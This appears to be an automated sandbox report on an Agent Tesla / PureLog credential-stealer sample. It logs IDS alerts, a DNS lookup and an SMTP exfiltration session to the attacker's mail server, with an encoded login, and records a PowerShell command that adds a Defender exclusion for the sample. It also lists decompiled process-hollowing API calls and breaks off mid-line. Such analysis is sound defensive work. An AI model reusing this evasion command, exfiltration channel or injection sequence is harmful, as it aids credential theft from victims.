                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000xac6d80xac800077eeccd98f561ab17121bfddc9d2000False0.8713711503623188data7.662076834159514IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0xb00000x5d40x600f2c6006ddde40101dc36f1edb6adca50False0.4231770833333333data4.140235585798007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0xb20000xc0x200031ab9b1a00650631bf1ef1ca12551ddFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0xb00900x344data0.41985645933014354
                                                                                                    RT_MANIFEST0xb03e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-11-30T14:18:05.436393+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449734199.79.62.115587TCP
                                                                                                    2024-11-30T14:18:05.436393+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449734199.79.62.115587TCP
                                                                                                    2024-11-30T14:19:39.797227+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449734199.79.62.115587TCP
                                                                                                    2024-11-30T14:19:39.797227+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.449734199.79.62.115587TCP
                                                                                                    2024-11-30T14:19:39.797227+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449734199.79.62.115587TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 30, 2024 14:18:01.642905951 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:01.763135910 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:01.763195038 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:02.997622013 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:02.998665094 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:03.118732929 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:03.384172916 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:03.429018974 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:03.436634064 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:03.556525946 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:03.822097063 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:03.822349072 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:03.942317009 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:04.266436100 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:04.266685963 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:04.386991024 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:04.652282953 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:04.653711081 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:04.773758888 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.046787024 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.049743891 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:05.169764042 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.435178041 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.436295033 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:05.436393023 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:05.436412096 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:05.436424017 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:18:05.556499004 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.556509972 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.556548119 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.556601048 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.928853989 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:18:05.976025105 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:19:39.210843086 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:19:39.331716061 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:19:39.797054052 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:19:39.797226906 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:19:39.797260046 CET58749734199.79.62.115192.168.2.4
                                                                                                    Nov 30, 2024 14:19:39.797306061 CET49734587192.168.2.4199.79.62.115
                                                                                                    Nov 30, 2024 14:19:39.917244911 CET58749734199.79.62.115192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 30, 2024 14:17:59.195509911 CET5920753192.168.2.41.1.1.1
                                                                                                    Nov 30, 2024 14:18:00.196083069 CET5920753192.168.2.41.1.1.1
                                                                                                    Nov 30, 2024 14:18:01.210433960 CET5920753192.168.2.41.1.1.1
                                                                                                    Nov 30, 2024 14:18:01.636464119 CET53592071.1.1.1192.168.2.4
                                                                                                    Nov 30, 2024 14:18:01.639902115 CET53592071.1.1.1192.168.2.4
                                                                                                    Nov 30, 2024 14:18:01.640259981 CET53592071.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Nov 30, 2024 14:17:59.195509911 CET192.168.2.41.1.1.10xa242Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                                    Nov 30, 2024 14:18:00.196083069 CET192.168.2.41.1.1.10xa242Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                                    Nov 30, 2024 14:18:01.210433960 CET192.168.2.41.1.1.10xa242Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Nov 30, 2024 14:18:01.636464119 CET1.1.1.1192.168.2.40xa242No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                                    Nov 30, 2024 14:18:01.639902115 CET1.1.1.1192.168.2.40xa242No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                                    Nov 30, 2024 14:18:01.640259981 CET1.1.1.1192.168.2.40xa242No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                    Nov 30, 2024 14:18:02.997622013 CET58749734199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Sat, 30 Nov 2024 18:48:02 +0530
                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                    220 and/or bulk e-mail.
                                                                                                    Nov 30, 2024 14:18:02.998665094 CET49734587192.168.2.4199.79.62.115EHLO 675052
                                                                                                    Nov 30, 2024 14:18:03.384172916 CET58749734199.79.62.115192.168.2.4250-md-54.webhostbox.net Hello 675052 [8.46.123.228]
                                                                                                    250-SIZE 52428800
                                                                                                    250-8BITMIME
                                                                                                    250-PIPELINING
                                                                                                    250-PIPECONNECT
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-STARTTLS
                                                                                                    250 HELP
                                                                                                    Nov 30, 2024 14:18:03.436634064 CET49734587192.168.2.4199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                                                                    Nov 30, 2024 14:18:03.822097063 CET58749734199.79.62.115192.168.2.4334 UGFzc3dvcmQ6
                                                                                                    Nov 30, 2024 14:18:04.266436100 CET58749734199.79.62.115192.168.2.4235 Authentication succeeded
                                                                                                    Nov 30, 2024 14:18:04.266685963 CET49734587192.168.2.4199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                                                                    Nov 30, 2024 14:18:04.652282953 CET58749734199.79.62.115192.168.2.4250 OK
                                                                                                    Nov 30, 2024 14:18:04.653711081 CET49734587192.168.2.4199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                                                                    Nov 30, 2024 14:18:05.046787024 CET58749734199.79.62.115192.168.2.4250 Accepted
                                                                                                    Nov 30, 2024 14:18:05.049743891 CET49734587192.168.2.4199.79.62.115DATA
                                                                                                    Nov 30, 2024 14:18:05.435178041 CET58749734199.79.62.115192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                                    Nov 30, 2024 14:18:05.436424017 CET49734587192.168.2.4199.79.62.115.
                                                                                                    Nov 30, 2024 14:18:05.928853989 CET58749734199.79.62.115192.168.2.4250 OK id=1tHNML-004NDf-0k
                                                                                                    Nov 30, 2024 14:19:39.210843086 CET49734587192.168.2.4199.79.62.115QUIT
                                                                                                    Nov 30, 2024 14:19:39.797054052 CET58749734199.79.62.115192.168.2.4221 md-54.webhostbox.net closing connection

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:08:17:53
                                                                                                    Start date:30/11/2024
                                                                                                    Path:C:\Users\user\Desktop\LPO-2024-357.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\LPO-2024-357.exe"
                                                                                                    Imagebase:0x740000
                                                                                                    File size:709'120 bytes
                                                                                                    MD5 hash:B15E3E1EB0ABFB4967C65BF33665FCBB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1700975172.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1694260808.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1694260808.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1690208458.0000000002B4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:08:17:56
                                                                                                    Start date:30/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LPO-2024-357.exe"
                                                                                                    Imagebase:0x470000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:08:17:56
                                                                                                    Start date:30/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:08:17:56
                                                                                                    Start date:30/11/2024
                                                                                                    Path:C:\Users\user\Desktop\LPO-2024-357.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\LPO-2024-357.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:709'120 bytes
                                                                                                    MD5 hash:B15E3E1EB0ABFB4967C65BF33665FCBB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2923605654.000000000287A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2921447380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2923605654.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2923605654.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:5
                                                                                                    Start time:08:17:58
                                                                                                    Start date:30/11/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.6%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:2.5%
                                                                                                      Total number of Nodes:405
                                                                                                      Total number of Limit Nodes:27
                                                                                                      execution_graph 47707 9113541 47708 9113562 47707->47708 47712 9113591 47708->47712 47717 91135a0 47708->47717 47709 9113582 47713 91135c6 47712->47713 47714 91135ef 47713->47714 47722 911d3a1 47713->47722 47727 911d3b0 47713->47727 47714->47709 47718 91135c6 47717->47718 47719 91135ef 47718->47719 47720 911d3a1 DrawTextExW 47718->47720 47721 911d3b0 DrawTextExW 47718->47721 47719->47709 47720->47719 47721->47719 47724 911d3b0 47722->47724 47723 911d87a 47723->47714 47724->47723 47732 911d8b1 47724->47732 47736 911d8c0 47724->47736 47729 911d3e5 47727->47729 47728 911d87a 47728->47714 47729->47728 47730 911d8b1 DrawTextExW 47729->47730 47731 911d8c0 DrawTextExW 47729->47731 47730->47729 47731->47729 47740 911d930 47732->47740 47745 911d940 47732->47745 47733 911d8fc 47733->47724 47737 911d8fc 47736->47737 47738 911d930 DrawTextExW 47736->47738 47739 911d940 DrawTextExW 47736->47739 47737->47724 47738->47737 47739->47737 47741 911d963 47740->47741 47742 911d981 47741->47742 47750 7648990 47741->47750 47755 76489a0 47741->47755 47742->47733 47746 911d963 47745->47746 47747 911d981 47746->47747 47748 76489a0 DrawTextExW 47746->47748 47749 7648990 DrawTextExW 47746->47749 47747->47733 47748->47747 47749->47747 47751 76489ca 47750->47751 47752 76489db 47750->47752 47751->47742 47752->47751 47760 9117958 47752->47760 47765 9117968 47752->47765 47756 76489ca 47755->47756 47757 76489db 47755->47757 47756->47742 47757->47756 47758 9117958 DrawTextExW 47757->47758 47759 9117968 DrawTextExW 47757->47759 47758->47756 47759->47756 47761 9117990 47760->47761 47762 9117a92 47761->47762 47770 9117f11 47761->47770 47775 9117f20 47761->47775 47762->47751 47766 9117990 47765->47766 47767 9117a92 47766->47767 47768 9117f11 DrawTextExW 47766->47768 47769 9117f20 DrawTextExW 47766->47769 47767->47751 47768->47767 47769->47767 47771 9117f36 47770->47771 47780 91182b0 47771->47780 47784 91182a0 47771->47784 47772 9117fac 47772->47762 47776 9117f36 47775->47776 47778 91182b0 DrawTextExW 47776->47778 47779 91182a0 DrawTextExW 47776->47779 47777 9117fac 47777->47762 47778->47777 47779->47777 47789 91182f0 47780->47789 47793 91182e0 47780->47793 47781 91182ce 47781->47772 47785 911829d 47784->47785 47785->47784 47787 91182f0 DrawTextExW 47785->47787 47788 91182e0 DrawTextExW 47785->47788 47786 91182ce 47786->47772 47787->47786 47788->47786 47790 91182f5 47789->47790 47791 911834d 47790->47791 47798 9115300 47790->47798 47791->47781 47794 91182dd 47793->47794 47795 91182ee 47793->47795 47794->47781 47796 911834d 47795->47796 47797 9115300 DrawTextExW 47795->47797 47796->47781 47797->47796 47800 9115321 47798->47800 47799 9115336 47799->47791 47800->47799 47802 76465cc DrawTextExW 47800->47802 47803 76472a9 DrawTextExW 47800->47803 47801 9115390 47802->47801 47803->47801 47944 7b0f3c0 47945 7b0f3e6 47944->47945 47946 7b0f54b 47944->47946 47945->47946 47948 7b0c92c 47945->47948 47949 7b0f640 PostMessageW 47948->47949 47950 7b0f6ac 47949->47950 47950->47945 47804 103d420 47805 103d466 GetCurrentProcess 47804->47805 47807 103d4b1 47805->47807 47808 103d4b8 GetCurrentThread 47805->47808 47807->47808 47809 103d4f5 GetCurrentProcess 47808->47809 47810 103d4ee 47808->47810 47811 103d52b 47809->47811 47810->47809 47812 103d553 GetCurrentThreadId 47811->47812 47813 103d584 47812->47813 47951 103b0b0 47952 103b0bf 47951->47952 47955 103b197 47951->47955 47960 103b1a8 47951->47960 47956 103b1b9 47955->47956 47957 103b1dc 47955->47957 47956->47957 47958 103b3e0 GetModuleHandleW 47956->47958 47957->47952 47959 103b40d 47958->47959 47959->47952 47961 103b1dc 47960->47961 47962 103b1b9 47960->47962 47961->47952 47962->47961 47963 103b3e0 GetModuleHandleW 47962->47963 47964 103b40d 47963->47964 47964->47952 47814 91164f8 47818 9116511 47814->47818 47822 9116520 47814->47822 47815 911650c 47819 911651a 47818->47819 47820 911655e 47818->47820 47825 91165f9 47819->47825 47820->47815 47824 91165f9 DrawTextExW 47822->47824 47823 911655e 47823->47815 47824->47823 47826 9116624 47825->47826 47830 76412d8 47826->47830 47835 76412cb 47826->47835 47827 911663a 47827->47820 47831 76412ef 47830->47831 47840 7641161 47830->47840 47846 76411b8 47830->47846 47851 76411c8 47830->47851 47831->47827 47837 7641161 DrawTextExW 47835->47837 47838 76411c8 DrawTextExW 47835->47838 47839 76411b8 DrawTextExW 47835->47839 47836 76412ef 47836->47827 47837->47836 47838->47836 47839->47836 47841 764116a 47840->47841 47842 76411d5 47840->47842 47841->47831 47843 7641232 47842->47843 47856 764a000 47842->47856 47861 764a041 47842->47861 47843->47831 47847 76411e1 47846->47847 47848 7641232 47847->47848 47849 764a000 DrawTextExW 47847->47849 47850 764a041 DrawTextExW 47847->47850 47848->47831 47849->47848 47850->47848 47852 76411e1 47851->47852 47853 7641232 47852->47853 47854 764a000 DrawTextExW 47852->47854 47855 764a041 DrawTextExW 47852->47855 47853->47831 47854->47853 47855->47853 47857 764a00f 47856->47857 47860 764a07f 47856->47860 47858 764a02f 47857->47858 47865 76421f0 47857->47865 47858->47843 47860->47843 47862 764a02f 47861->47862 47863 7649ffe 47861->47863 47862->47843 47863->47862 47864 76421f0 DrawTextExW 47863->47864 47864->47862 47866 76421fb 47865->47866 47867 764474e 47866->47867 47872 76456d8 47866->47872 47877 76456cb 47866->47877 47868 764541c 47867->47868 47883 7642200 47867->47883 47868->47858 47873 76456f9 47872->47873 47874 764570e 47873->47874 47890 7644208 47873->47890 47874->47866 47879 76456d2 47877->47879 47880 764565a 47877->47880 47878 764570e 47878->47866 47879->47878 47881 7644208 DrawTextExW 47879->47881 47880->47866 47882 764575e 47881->47882 47884 764220b 47883->47884 47885 76488c5 47884->47885 47909 7647d74 47884->47909 47887 76488fc 47885->47887 47888 76412d8 DrawTextExW 47885->47888 47889 76412cb DrawTextExW 47885->47889 47887->47868 47888->47887 47889->47887 47891 7644213 47890->47891 47894 76465cc 47891->47894 47893 764575e 47896 76465d7 47894->47896 47895 76472f1 47895->47893 47896->47895 47900 7648208 47896->47900 47905 7648218 47896->47905 47897 76473f5 47897->47893 47901 7648216 47900->47901 47902 76481be 47900->47902 47903 7647d0c DrawTextExW 47901->47903 47902->47897 47904 7648235 47903->47904 47904->47897 47906 764821d 47905->47906 47907 7647d0c DrawTextExW 47906->47907 47908 7648235 47907->47908 47908->47897 47911 7647d7f 47909->47911 47910 7648953 47910->47885 47911->47910 47913 76489a0 DrawTextExW 47911->47913 47914 7648990 DrawTextExW 47911->47914 47912 764894f 47912->47885 47913->47912 47914->47912 47965 91176a8 47967 91176bd 47965->47967 47969 9117777 47967->47969 47970 9112168 47967->47970 47968 911774c 47971 9112193 47970->47971 47972 911218c 47970->47972 47977 91121e6 47971->47977 47980 9110c54 47971->47980 47972->47968 47975 9110c54 GetCurrentThreadId 47976 91121ba 47975->47976 47976->47977 47984 9112650 47976->47984 47992 9112519 47976->47992 47977->47968 47981 9110c59 47980->47981 47982 91124cf GetCurrentThreadId 47981->47982 47983 91121b0 47981->47983 47982->47983 47983->47975 47985 9112671 47984->47985 47986 91126fe 47985->47986 48000 9112c59 47985->48000 48004 9112c68 47985->48004 47986->47977 47987 91126f3 47987->47986 48008 91130d1 47987->48008 48012 91130e0 47987->48012 47994 911253a 47992->47994 47993 911257f 47993->47977 47994->47993 47998 9112c59 DrawTextExW 47994->47998 47999 9112c68 DrawTextExW 47994->47999 47995 91126f3 47995->47993 47996 91130d1 DrawTextExW 47995->47996 47997 91130e0 DrawTextExW 47995->47997 47996->47993 47997->47993 47998->47995 47999->47995 48001 9112c76 48000->48001 48002 9112c8c 48001->48002 48016 9110d80 48001->48016 48002->47987 48005 9112c76 48004->48005 48006 9112c8c 48005->48006 48007 9110d80 DrawTextExW 48005->48007 48006->47987 48007->48006 48009 91130de 48008->48009 48010 9110d80 DrawTextExW 48009->48010 48011 911312c 48010->48011 48011->47986 48013 91130f0 48012->48013 48014 9110d80 DrawTextExW 48013->48014 48015 911312c 48014->48015 48015->47986 48017 9110d8b 48016->48017 48018 9112e42 48017->48018 48021 91178e8 48017->48021 48025 91178db 48017->48025 48018->48002 48022 9117907 48021->48022 48029 9117920 48021->48029 48034 9117913 48021->48034 48022->48018 48027 9117920 DrawTextExW 48025->48027 48028 9117913 DrawTextExW 48025->48028 48026 9117907 48026->48018 48027->48026 48028->48026 48030 9117929 48029->48030 48032 76489a0 DrawTextExW 48030->48032 48033 7648990 DrawTextExW 48030->48033 48031 911794d 48031->48022 48032->48031 48033->48031 48035 9117920 48034->48035 48037 76489a0 DrawTextExW 48035->48037 48038 7648990 DrawTextExW 48035->48038 48036 911794d 48036->48022 48037->48036 48038->48036 47915 1034668 47916 103467a 47915->47916 47917 1034686 47916->47917 47919 1034779 47916->47919 47920 103479d 47919->47920 47924 1034879 47920->47924 47928 1034888 47920->47928 47926 10348af 47924->47926 47925 103498c 47925->47925 47926->47925 47932 10344c4 47926->47932 47930 10348af 47928->47930 47929 103498c 47929->47929 47930->47929 47931 10344c4 CreateActCtxA 47930->47931 47931->47929 47933 1035918 CreateActCtxA 47932->47933 47935 10359db 47933->47935 47936 103d668 DuplicateHandle 47937 103d6fe 47936->47937 47938 7643ec8 47939 7643ecd 47938->47939 47940 76421f0 DrawTextExW 47939->47940 47943 7643ef7 47939->47943 47941 7643ef0 47940->47941 47942 7642200 DrawTextExW 47941->47942 47942->47943 47520 7b0d33d 47522 7b0d0f4 47520->47522 47521 7b0d103 47522->47521 47525 7b0e0f0 47522->47525 47529 7b0e0e1 47522->47529 47526 7b0e10a 47525->47526 47533 7b0e470 47526->47533 47530 7b0e0f0 47529->47530 47532 7b0e470 14 API calls 47530->47532 47531 7b0e12e 47531->47521 47532->47531 47534 7b0e495 47533->47534 47555 7b0e6ad 47534->47555 47560 7b0eacc 47534->47560 47565 7b0e7aa 47534->47565 47570 7b0e967 47534->47570 47574 7b0e706 47534->47574 47579 7b0e5e4 47534->47579 47587 7b0ece3 47534->47587 47591 7b0eca2 47534->47591 47596 7b0eb02 47534->47596 47601 7b0ea41 47534->47601 47606 7b0e87d 47534->47606 47611 7b0ef3d 47534->47611 47615 7b0eb1a 47534->47615 47620 7b0ec1a 47534->47620 47625 7b0e898 47534->47625 47629 7b0e777 47534->47629 47633 7b0ec90 47534->47633 47638 7b0e9af 47534->47638 47643 7b0e64e 47534->47643 47535 7b0e12e 47535->47521 47556 7b0e6b9 47555->47556 47557 7b0e750 47556->47557 47651 7b0c740 47556->47651 47655 7b0c739 47556->47655 47561 7b0e9ca 47560->47561 47562 7b0eaee 47560->47562 47561->47560 47659 7b0c650 47561->47659 47663 7b0c648 47561->47663 47566 7b0e6b9 47565->47566 47567 7b0e750 47566->47567 47568 7b0c740 ReadProcessMemory 47566->47568 47569 7b0c739 ReadProcessMemory 47566->47569 47568->47567 47569->47567 47667 7b0c590 47570->47667 47671 7b0c589 47570->47671 47571 7b0e985 47575 7b0e6b9 47574->47575 47576 7b0e750 47575->47576 47577 7b0c740 ReadProcessMemory 47575->47577 47578 7b0c739 ReadProcessMemory 47575->47578 47577->47576 47578->47576 47580 7b0e5ee 47579->47580 47675 7b0cccc 47580->47675 47679 7b0ccd8 47580->47679 47581 7b0e68e 47582 7b0e750 47581->47582 47585 7b0c740 ReadProcessMemory 47581->47585 47586 7b0c739 ReadProcessMemory 47581->47586 47582->47535 47585->47582 47586->47582 47588 7b0eea3 47587->47588 47589 7b0c650 WriteProcessMemory 47588->47589 47590 7b0c648 WriteProcessMemory 47588->47590 47589->47588 47590->47588 47592 7b0e6b9 47591->47592 47593 7b0e750 47592->47593 47594 7b0c740 ReadProcessMemory 47592->47594 47595 7b0c739 ReadProcessMemory 47592->47595 47594->47593 47595->47593 47597 7b0ee69 47596->47597 47683 7b0c079 47597->47683 47687 7b0c080 47597->47687 47598 7b0ee84 47603 7b0e6b9 47601->47603 47602 7b0e750 47603->47602 47604 7b0c740 ReadProcessMemory 47603->47604 47605 7b0c739 ReadProcessMemory 47603->47605 47604->47602 47605->47602 47607 7b0e6b9 47606->47607 47608 7b0e750 47607->47608 47609 7b0c740 ReadProcessMemory 47607->47609 47610 7b0c739 ReadProcessMemory 47607->47610 47608->47535 47609->47608 47610->47608 47612 7b0eea3 47611->47612 47612->47611 47613 7b0c650 WriteProcessMemory 47612->47613 47614 7b0c648 WriteProcessMemory 47612->47614 47613->47612 47614->47612 47616 7b0eb32 47615->47616 47617 7b0ec4a 47616->47617 47691 7b0bfd0 47616->47691 47695 7b0bfc8 47616->47695 47617->47535 47621 7b0ec20 47620->47621 47623 7b0bfd0 ResumeThread 47621->47623 47624 7b0bfc8 ResumeThread 47621->47624 47622 7b0ec4a 47622->47535 47623->47622 47624->47622 47627 7b0c650 WriteProcessMemory 47625->47627 47628 7b0c648 WriteProcessMemory 47625->47628 47626 7b0e8c6 47626->47535 47627->47626 47628->47626 47699 7b0c818 47629->47699 47703 7b0c820 47629->47703 47630 7b0e78b 47630->47535 47634 7b0eda6 47633->47634 47636 7b0c080 Wow64SetThreadContext 47634->47636 47637 7b0c079 Wow64SetThreadContext 47634->47637 47635 7b0edc1 47636->47635 47637->47635 47639 7b0e9b9 47638->47639 47640 7b0eaee 47639->47640 47641 7b0c650 WriteProcessMemory 47639->47641 47642 7b0c648 WriteProcessMemory 47639->47642 47641->47639 47642->47639 47645 7b0e5e6 47643->47645 47644 7b0e56a 47644->47535 47645->47644 47647 7b0ccd8 CreateProcessA 47645->47647 47648 7b0cccc CreateProcessA 47645->47648 47646 7b0e68e 47646->47644 47649 7b0c740 ReadProcessMemory 47646->47649 47650 7b0c739 ReadProcessMemory 47646->47650 47647->47646 47648->47646 47649->47644 47650->47644 47652 7b0c78b ReadProcessMemory 47651->47652 47654 7b0c7cf 47652->47654 47654->47557 47656 7b0c78b ReadProcessMemory 47655->47656 47658 7b0c7cf 47656->47658 47658->47557 47660 7b0c698 WriteProcessMemory 47659->47660 47662 7b0c6ef 47660->47662 47662->47561 47664 7b0c698 WriteProcessMemory 47663->47664 47666 7b0c6ef 47664->47666 47666->47561 47668 7b0c5d0 VirtualAllocEx 47667->47668 47670 7b0c60d 47668->47670 47670->47571 47672 